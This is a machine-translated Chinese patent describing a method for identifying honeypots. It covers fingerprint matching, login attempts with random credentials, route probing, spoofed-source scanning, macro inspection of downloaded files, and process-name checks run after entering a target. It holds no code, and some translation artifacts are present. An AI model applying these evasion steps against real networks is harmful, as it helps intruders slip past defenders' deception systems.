As an example, as shown in table 2, the first device determines that the target port number is 3306, the interaction policy is to log in the port multiple times by using a randomly generated account and password, and if the interaction result is that the port is logged in multiple times successfully, it may be determined that not only the honeypot exists in the target, but also the honeypot existing in the target is a mySQL weak password honeypot.
It should be noted that table 2 is only an example of honeypot identification plug-in for identifying honeypots, and is also limited to honeypot identification plug-ins. Other more honeypot identification plug-ins can be installed in the first device, plug-in use conditions, honeypot identification modes, port numbers and identifiable honeypots of the honeypot identification plug-ins can be other, and the honeypot identification plug-ins are not limited in the embodiment of the application.
The honeypot identification plug-in identifies honeypots in an interactive mode with the ports, so that the first device can identify high-interaction honeypots through the honeypot identification plug-in. In addition, because various honeypot identification plug-ins are installed in the first equipment, and each honeypot identification plug-in corresponds to one or more interaction strategies, the first equipment can identify different types of honeypots through the one or more interaction strategies of each honeypot identification plug-in the various honeypot identification plug-ins, namely the first equipment can identify more types of honeypots, has better universality and meets the diversity of honeypots in network security.
In addition, when the first device does not find a target honeypot identification plug-in matching the target port from the multiple honeypot identification plug-ins, or the interaction result does not meet the preset condition, it cannot be determined that the service provided by the target port is certainly not a honeypot simulation service, that is, it cannot be determined that honeypots do not necessarily exist in the target to be identified. In this case, a greater variety of honeypots can be identified by adding a honeypot identification plug-in to the first device, or by adding a honeypot identification plug-in to the honeypot identification plug-in, or by other means.
For example, the first device may also determine that honeypots exist in the target according to the following two methods.
The first method comprises the following steps: and downloading the file from the target, extracting the macro code of the file, and determining that the honey pot exists in the target if the honey mark exists in the target according to the macro code.
The file downloaded from the target may be a word, pdf, execel, or the like.
The honey mark is a file with a URL (uniform resource location address). When a hidden link exists in the file, the first device downloads and opens the file, the link can be automatically triggered, and the target to be identified can acquire information such as an IP address of the first device.
For example, the first device may extract the macro code from the downloaded file through oledmp. And then, determining whether the code of the illegal operation exists in the macro code, if so, determining that the file is a honey mark, and further determining that a honey pot exists in the target.
The code for the violation operation may include a code for obtaining a host authority, a network violation external connection, and the like.
The second method comprises the following steps: and determining the running process in the target, and if the process name of the running process is determined to have the second preset field, determining that the honeypot exists in the target.
Wherein the second preset field may include one or more of a concept-agent, hpfclean, and heartbeat.
Wherein the honeypot includes components of a honeypot agant. The first device may determine that a honeypot exists in the target by determining whether a process is present in the target that is running a honeypot agant.
For example, the first device may deploy a get process script in the target, and obtain the running process in the target by the get process script, and determine whether the process name of the running process has the second preset field. And if the second preset field exists, determining that the honeypot exists in the target.
As an example, if the first device determines that the process name of the running process has a delete-agent, the first device determines that the honeypot agant of the Ehoney honeypot is installed in the target. And if the process name of the running process is determined to have the HpfClient, determining the honeypot agant with the magic honeypot in the target. And if the process name of the running process is determined to have heartbeat, determining the honeypot agant of the Antian honeypot installed in the target.
For example, the first device may deploy a get process script in the target after breaking through and entering the target.
In the embodiment of the application, for the target to be identified, a scanning request is sent to the target port of the target, and then a scanning response from the target port is obtained. And then determining that the honeypot exists in the target if the field in the scanning response is matched with any characteristic fingerprint in the honeypot fingerprint library. And if the field in the scanning response is determined not to be matched with all the characteristic fingerprints in the honeypot fingerprint library, determining a target honeypot identification plug-in matched with the target port, and determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port. The honeypot fingerprint library comprises characteristic fingerprints of various honeypots, and the target honeypot identification plug-in is used for interacting with the target port. The honeypots in the target can be identified by matching the scanning response of the target port with the characteristic fingerprints of the honeypot fingerprint library, and the honeypots in the target can also be identified by the interaction result of the target honeypot identification plug-in and the target port, so that the honeypots which can be identified are more in types and better in universality, and the diversity of the honeypots in network security is met.
Referring to fig. 2, fig. 2 is a schematic structural diagram of a honeypot identification apparatus according to an embodiment of the present application. The honeypot identification apparatus can be implemented by software, hardware or a combination of the two as part or all of a computer device, which can be the computer device shown in fig. 3 below. As shown in fig. 2, the apparatus includes a sending module 201, an obtaining module 202, a first determining module 203, and a second determining module 204.
In this embodiment of the present application, the sending module 201 is configured to send, to a target port of a target, a scanning request for the target to be identified;
an obtaining module 202, configured to obtain a scan response from a target port;
the first determination module 203 is used for determining that the honeypots exist in the target if the fields in the scanning response are determined to be matched with any characteristic fingerprint in a honeypot fingerprint library, wherein the honeypot fingerprint library comprises the characteristic fingerprints of various honeypots;
and a second determining module 204, configured to determine, if it is determined that the field in the scan response is not matched with all the feature fingerprints in the honeypot fingerprint library, a target honeypot identification plug-in that is matched with the target port, determine, according to an interaction result of the target honeypot identification plug-in and the target port, that a honeypot exists in the target, where the target honeypot identification plug-in is used for interacting with the target port.
As an example, the interaction policy corresponding to the target honeypot identification plug-in is a target interaction policy, and the target honeypot identification plug-in is used for interacting with the target port according to the target interaction policy;
the apparatus further comprises an interaction module:
the interaction module is used for interacting with the target port through the target honeypot identification plug-in according to the target interaction strategy to obtain an interaction result of the target honeypot identification plug-in and the target port;
the second determining module 204 is further configured to determine whether the interaction result meets a preset condition, and if the interaction result meets the preset condition, determine that the honeypot exists in the target.
As one example, the preset condition includes any one of the following conditions:
a first preset field exists in the interaction result;
under the condition that the target interaction strategy is that the target port is logged in for multiple times by using the randomly generated account and the password, the target port is logged in for multiple times successfully;
and under the condition that the target interaction strategy is to request different routes for the target port for multiple times, the response results from the target port after the different routes are requested for multiple times are the same.
As an example, the second determining module 204 is further configured to determine a target service provided by the target port;
and determining the honeypot identification plug-in matched with the target service from the plurality of honeypot identification plug-ins as the target honeypot identification plug-in.
As an example, each honeypot identification plug-in the plurality of honeypot identification plug-ins has a corresponding interaction policy;
the second determining module 204 is further configured to determine, if the target service includes an SSH service, an FTP service, a tele service, or a mySQL service, that the honeypot identification plug-in which the target port is logged in multiple times by using a randomly generated account and password is used as the target honeypot identification plug-in corresponding to the interaction policy from the multiple honeypot identification plug-ins;
the second determining module 204 is further configured to determine, if the target service includes an HTTP service and an HTTPs service, a honeypot identification plug-in with a corresponding interaction policy of multiple requests for different routes to the target port as the target honeypot identification plug-in.
As an example, the sending module 201 is further configured to generate at least one fake source device address according to the source device address of the first device;
constructing a plurality of scanning requests according to a source device address and at least one pseudo source device address, wherein the plurality of scanning requests at least comprise a first scanning request and a second scanning request, the first scanning request is a request sent by the source device address, and the second scanning request is a request sent by any pseudo source device address in at least one pseudo source device address which is forged;
multiple scan requests are sent to the target port to spoof the target port.
As one example, the apparatus further comprises a third determining module or a fourth determining module:
the third determining module is used for downloading the file from the target, extracting the macro code of the file, and determining that the honey pot exists in the target if the honey mark exists in the target according to the macro code;
and the fourth determining module is used for determining the running process in the target, and if the process name of the running process is determined to have the second preset field, determining that the honeypot exists in the target.
It should be noted that: the honeypot identification apparatus provided in the above embodiment is only illustrated by dividing the functional modules, and in practical applications, the functions may be distributed by different functional modules according to needs, that is, the internal structure of the apparatus is divided into different functional modules to complete all or part of the functions described above.
Each functional unit and module in the above embodiments may be integrated into one processing unit, or each unit may exist alone physically, or two or more units are integrated into one unit, and the integrated unit may be implemented in a form of hardware, or in a form of software functional unit. In addition, specific names of the functional units and modules are only used for distinguishing one functional unit from another, and are not used for limiting the protection scope of the embodiments of the present application.
The embodiment of the honeypot identification apparatus and the embodiment of the honeypot identification method provided by the above embodiment belong to the same concept, and for specific working processes of units and modules and technical effects brought by the working processes in the above embodiments, reference may be made to the part of the embodiment of the method, and details are not described here.
Referring to fig. 3, fig. 3 is a schematic structural diagram of a computer device according to an embodiment of the present disclosure. As shown in fig. 3, the computer apparatus includes: a processor 301, a memory 302 and a computer program 303 stored in the memory 302 and being executable on the processor 301, the steps in the honeypot identification method in the above embodiments being implemented when the computer program 303 is executed by the processor 301.
The computer device may be the first device or the second device in the embodiment of fig. 1, and may be a general-purpose computer device or a special-purpose computer device. In a specific implementation, the computer device may be a terminal or a server, and the terminal may be a mobile phone, a desktop computer, a laptop computer, a palmtop computer, a tablet computer, a wireless terminal device, or a communication device, and the like. Those skilled in the art will appreciate that fig. 3 is merely an example of a computing device and is not intended to limit the computing device and may include more or less components than those shown, or some components in combination, or different components, such as input output devices, network access devices, etc.
The Processor 301 may be a Central Processing Unit (CPU), and the Processor 301 may also be other general purpose Processor, a Digital Signal Processor (DSP), an Application Specific Integrated Circuit (ASIC), an off-the-shelf Programmable Gate Array (FPGA) or other Programmable logic device, discrete Gate or transistor logic, discrete hardware components, etc. A general purpose processor may be a microprocessor or any conventional processor.
The storage 302 may be an internal storage unit of the computer device, such as a hard disk or a memory of the computer device, in some embodiments. The memory 302 may also be an external storage device of the computer device in other embodiments, such as a plug-in hard disk, a Smart Media Card (SMC), a Secure Digital (SD) Card, a Flash memory Card (Flash Card), etc. provided on the computer device. Further, the memory 302 may also include both internal storage units of the computer device and external storage devices. The memory 302 is used to store an operating system, application programs, a Boot Loader (Boot Loader), data, and other programs. The memory 302 may also be used to temporarily store data that has been output or is to be output.
An embodiment of the present application further provides a computer device, where the computer device includes: at least one processor, a memory, and a computer program stored in the memory and executable on the at least one processor, the processor implementing the steps of any of the various method embodiments described above when executing the computer program.
The embodiments of the present application also provide a computer-readable storage medium, where a computer program is stored, and when the computer program is executed by a processor, the steps in the above-mentioned method embodiments can be implemented.
The embodiments of the present application provide a computer program product, which when run on a computer causes the computer to perform the steps of the above-described method embodiments.
The integrated unit, if implemented in the form of a software functional unit and sold or used as a stand-alone product, may be stored in a computer readable storage medium. Based on such understanding, all or part of the processes in the above method embodiments may be implemented by a computer program, which may be stored in a computer readable storage medium and used by a processor to implement the steps of the above method embodiments. Wherein the computer program comprises computer program code, which may be in the form of source code, object code, an executable file or some intermediate form, etc. The computer readable medium may include at least: any entity or apparatus capable of carrying computer program code to a photographing apparatus/terminal device, a recording medium, computer Memory, ROM (Read-Only Memory), RAM (Random Access Memory), CD-ROM (Compact Disc Read-Only Memory), magnetic tape, floppy disk, optical data storage device, etc. The computer-readable storage medium referred to herein may be a non-volatile storage medium, in other words, a non-transitory storage medium.
It should be understood that all or part of the steps for implementing the above embodiments may be implemented by software, hardware, firmware or any combination thereof. When implemented in software, may be implemented in whole or in part in the form of a computer program product. The computer program product includes one or more computer instructions. The computer instructions may be stored in the computer-readable storage medium described above.
In the above embodiments, the descriptions of the respective embodiments have respective emphasis, and reference may be made to the related descriptions of other embodiments for parts that are not described or illustrated in a certain embodiment.
Those of ordinary skill in the art will appreciate that the various illustrative elements and algorithm steps described in connection with the embodiments disclosed herein may be implemented as electronic hardware or combinations of computer software and electronic hardware. Whether such functionality is implemented as hardware or software depends upon the particular application and design constraints imposed on the implementation. Skilled artisans may implement the described functionality in varying ways for each particular application, but such implementation decisions should not be interpreted as causing a departure from the scope of the present application.
In the embodiments provided in the present application, it should be understood that the disclosed apparatus/computer device and method may be implemented in other ways. For example, the above-described apparatus/computer device embodiments are merely illustrative, and for example, a module or a unit may be divided into only one logical function, and may be implemented in other ways, for example, multiple units or components may be combined or integrated into another system, or some features may be omitted, or not implemented. In addition, the shown or discussed mutual coupling or direct coupling or communication connection may be an indirect coupling or communication connection through some interfaces, devices or units, and may be in an electrical, mechanical or other form.
Units described as separate parts may or may not be physically separate, and parts displayed as units may or may not be physical units, may be located in one place, or may be distributed on a plurality of network units. Some or all of the units can be selected according to actual needs to achieve the purpose of the solution of the embodiment.
The above-mentioned embodiments are only used for illustrating the technical solutions of the present application, and not for limiting the same; although the present application has been described in detail with reference to the foregoing embodiments, it should be understood by those of ordinary skill in the art that: the technical solutions described in the foregoing embodiments may still be modified, or some technical features may be equivalently replaced; such modifications and substitutions do not substantially depart from the spirit and scope of the embodiments of the present application and are intended to be included within the scope of the present application.

Claims (10)

1. A honeypot identification method, applied to a first device, the method comprising:
for a target to be identified, sending a scanning request to a target port of the target;
acquiring a scanning response from the target port;
if the field in the scanning response is determined to be matched with any characteristic fingerprint in a honeypot fingerprint library, determining that a honeypot exists in the target, wherein the honeypot fingerprint library comprises the characteristic fingerprints of various honeypots;
and if the fields in the scanning response are determined not to be matched with all the characteristic fingerprints in the honeypot fingerprint library, determining a target honeypot identification plug-in matched with the target port, and determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, wherein the target honeypot identification plug-in is used for interacting with the target port.
2. The method of claim 1, wherein the interaction policy corresponding to the target honeypot identification plug-in is a target interaction policy, the target honeypot identification plug-in being used for interacting with the target port according to the target interaction policy;
before determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, the method further comprises the following steps:
interacting with the target port through the target honeypot identification plug-in according to the target interaction strategy to obtain an interaction result of the target honeypot identification plug-in and the target port;
the determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port comprises:
determining whether the interaction result meets a preset condition;
and if the interaction result meets the preset condition, determining that the honeypots exist in the target.
3. The method of claim 2, wherein the preset condition comprises any one of the following conditions:
a first preset field exists in the interaction result;
under the condition that the target interaction strategy is that the target port is logged in for multiple times by using a randomly generated account and a password, the target port is logged in for multiple times successfully;
and under the condition that the target interaction strategy is to request different routes for the target port for multiple times, the response results from the target port after the different routes are requested for multiple times are the same.
4. The method of claim 1, wherein the determining a target honeypot identification plug-in that matches the target port comprises:
determining a target service provided by the target port;
determining a honeypot identification plug-in matching the target service from a plurality of honeypot identification plug-ins as the target honeypot identification plug-in.
5. The method of claim 4, wherein each honeypot identification plug-in of the plurality of honeypot identification plug-ins has a corresponding interaction policy;
the step of determining the honeypot identification plug-in which is matched with the target service from the plurality of honeypot identification plug-ins as the target honeypot identification plug-in comprises any one of the following modes:
if the target service comprises SSH service, FTP service, TELENT service or mySQL service, determining the corresponding interaction strategy from the various honeypot identification plug-ins as the honeypot identification plug-in which the target port is logged in for multiple times by using a randomly generated account number and password;
and if the target service comprises HTTP service and HTTPS service, determining the corresponding interaction strategy from the plurality of honeypot identification plug-ins as the honeypot identification plug-in which the target port requests different routes for multiple times as the target honeypot identification plug-in.
6. The method of any of claims 1-5, wherein sending the scan request to the target port comprises:
generating at least one fake source device address according to the source device address of the first device;
constructing a plurality of scanning requests according to the source device address and the at least one pseudo source device address, wherein the plurality of scanning requests at least comprise a first scanning request and a second scanning request, the first scanning request is a request sent by the source device address, and the second scanning request is a request sent by any pseudo source device address in the at least one pseudo source device address which is forged;
sending the plurality of scan requests to the target port to spoof scan the target port.
7. The method of any of claims 1-5, wherein the method further comprises:
downloading a file from the target, extracting a macro code of the file, and determining that a honey pot exists in the target if the honey mark exists in the target according to the macro code;
alternatively, the first and second electrodes may be,
and determining the running process in the target, and if the process name of the running process is determined to have a second preset field, determining that the honeypot exists in the target.
8. A honeypot identification apparatus, the apparatus comprising:
a sending module, configured to send a scan request to a target port of a target to be identified;
an acquisition module for acquiring a scan response from the target port;
a first determination module, configured to determine that a honeypot exists in the target if it is determined that the field in the scan response matches any one of the feature fingerprints in a honeypot fingerprint library, where the honeypot fingerprint library includes feature fingerprints of a plurality of honeypots;
and the second determination module is used for determining a target honeypot identification plug-in matched with the target port if the fields in the scanning response are determined not to be matched with all the characteristic fingerprints in the honeypot fingerprint library, determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, and the target honeypot identification plug-in is used for interacting with the target port.
9. A computer device, characterized in that the computer device comprises a memory, a processor and a computer program stored in the memory and executable on the processor, which computer program, when executed by the processor, implements the method according to any of claims 1 to 7.
10. A computer-readable storage medium, characterized in that the computer-readable storage medium stores a computer program which, when executed by a processor, implements the method of any one of claims 1 to 7.
CN202210269896.8A 2022-03-18 2022-03-18 Honeypot identification method, device, equipment and storage medium Active CN114826663B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202210269896.8A CN114826663B (en) 2022-03-18 2022-03-18 Honeypot identification method, device, equipment and storage medium

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202210269896.8A CN114826663B (en) 2022-03-18 2022-03-18 Honeypot identification method, device, equipment and storage medium

Publications (2)

Publication Number Publication Date
CN114826663A true CN114826663A (en) 2022-07-29
CN114826663B CN114826663B (en) 2023-12-01

Family

ID=82530610

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202210269896.8A Active CN114826663B (en) 2022-03-18 2022-03-18 Honeypot identification method, device, equipment and storage medium

Country Status (1)

Country Link
CN (1) CN114826663B (en)

Cited By (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN116094847A (en) * 2023-04-11 2023-05-09 中国工商银行股份有限公司 Honeypot identification method, honeypot identification device, computer equipment and storage medium
CN116668187A (en) * 2023-07-19 2023-08-29 杭州海康威视数字技术股份有限公司 Honeypot identification method and device and electronic equipment
CN117220900A (en) * 2023-07-14 2023-12-12 博智安全科技股份有限公司 Method and system for automatically detecting honeypot system
CN118138371A (en) * 2024-04-29 2024-06-04 杭州海康威视数字技术股份有限公司 Quick honey pot construction method, device and equipment based on search engine

Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20050044418A1 (en) * 2003-07-25 2005-02-24 Gary Miliefsky Proactive network security system to protect against hackers
CN101669347A (en) * 2007-04-23 2010-03-10 国际商业机器公司 Method and apparatus for detecting port scans with fake source address
CN107330331A (en) * 2016-04-29 2017-11-07 阿里巴巴集团控股有限公司 There are the methods, devices and systems of the system of leak in identification
CN111651757A (en) * 2020-06-05 2020-09-11 深圳前海微众银行股份有限公司 Attack behavior monitoring method, device, equipment and storage medium
CN112217800A (en) * 2020-09-14 2021-01-12 广州大学 Honeypot identification method, system, device and medium
US10986129B1 (en) * 2019-03-28 2021-04-20 Rapid7, Inc. Live deployment of deception systems
CN113472819A (en) * 2021-09-03 2021-10-01 国际关系学院 Honeypot detection and identification method and device based on fingerprint characteristics

Patent Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20050044418A1 (en) * 2003-07-25 2005-02-24 Gary Miliefsky Proactive network security system to protect against hackers
CN101669347A (en) * 2007-04-23 2010-03-10 国际商业机器公司 Method and apparatus for detecting port scans with fake source address
CN107330331A (en) * 2016-04-29 2017-11-07 阿里巴巴集团控股有限公司 There are the methods, devices and systems of the system of leak in identification
US10986129B1 (en) * 2019-03-28 2021-04-20 Rapid7, Inc. Live deployment of deception systems
CN111651757A (en) * 2020-06-05 2020-09-11 深圳前海微众银行股份有限公司 Attack behavior monitoring method, device, equipment and storage medium
CN112217800A (en) * 2020-09-14 2021-01-12 广州大学 Honeypot identification method, system, device and medium
CN113472819A (en) * 2021-09-03 2021-10-01 国际关系学院 Honeypot detection and identification method and device based on fingerprint characteristics

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
史彦东;: "入侵诱骗***中自动生成特征规则的研究", 电脑知识与技术, no. 15 *

Cited By (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN116094847A (en) * 2023-04-11 2023-05-09 中国工商银行股份有限公司 Honeypot identification method, honeypot identification device, computer equipment and storage medium
CN117220900A (en) * 2023-07-14 2023-12-12 博智安全科技股份有限公司 Method and system for automatically detecting honeypot system
CN116668187A (en) * 2023-07-19 2023-08-29 杭州海康威视数字技术股份有限公司 Honeypot identification method and device and electronic equipment
CN116668187B (en) * 2023-07-19 2023-11-03 杭州海康威视数字技术股份有限公司 Honeypot identification method and device and electronic equipment
CN118138371A (en) * 2024-04-29 2024-06-04 杭州海康威视数字技术股份有限公司 Quick honey pot construction method, device and equipment based on search engine
CN118138371B (en) * 2024-04-29 2024-07-02 杭州海康威视数字技术股份有限公司 Quick honey pot construction method, device and equipment based on search engine

Also Published As

Publication number Publication date
CN114826663B (en) 2023-12-01

Similar Documents

Publication Publication Date Title
US9742805B2 (en) Managing dynamic deceptive environments
CN114826663B (en) Honeypot identification method, device, equipment and storage medium
CN112995151B (en) Access behavior processing method and device, storage medium and electronic equipment
US11212281B2 (en) Attacker detection via fingerprinting cookie mechanism
Tsikerdekis et al. Approaches for preventing honeypot detection and compromise
US11265334B1 (en) Methods and systems for detecting malicious servers
US11489853B2 (en) Distributed threat sensor data aggregation and data export
US20210344690A1 (en) Distributed threat sensor analysis and correlation
CN111756761A (en) Network defense system and method based on flow forwarding and computer equipment
CN111565203B (en) Method, device and system for protecting service request and computer equipment
Kumar et al. DDOS prevention in IoT
CN113179280B (en) Deception defense method and device based on malicious code external connection behaviors and electronic equipment
Vidalis et al. Assessing identity theft in the Internet of Things
CN113676449A (en) Network attack processing method and device
US10630708B2 (en) Embedded device and method of processing network communication data
CN113098835A (en) Honeypot implementation method based on block chain, honeypot client and honeypot system
CN112242974A (en) Attack detection method and device based on behaviors, computing equipment and storage medium
CN114531258B (en) Network attack behavior processing method and device, storage medium and electronic equipment
CN113098865B (en) Browser fingerprint acquisition method and device, electronic equipment and storage medium
US20230370495A1 (en) Breach prediction via machine learning
CN116781331A (en) Reverse proxy-based honeypot trapping network attack tracing method and device
Sokol et al. Definition of attack in the context of low-level interaction server honeypots
CN113709130A (en) Risk identification method and device based on honeypot system
Orucho et al. Security threats affecting user-data on transit in mobile banking applications: A review
Horbatiuk et al. Methods of Detection of Http Attacks on a Smart Home Using the Algebraic Matching Method.

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant
GR01 Patent grant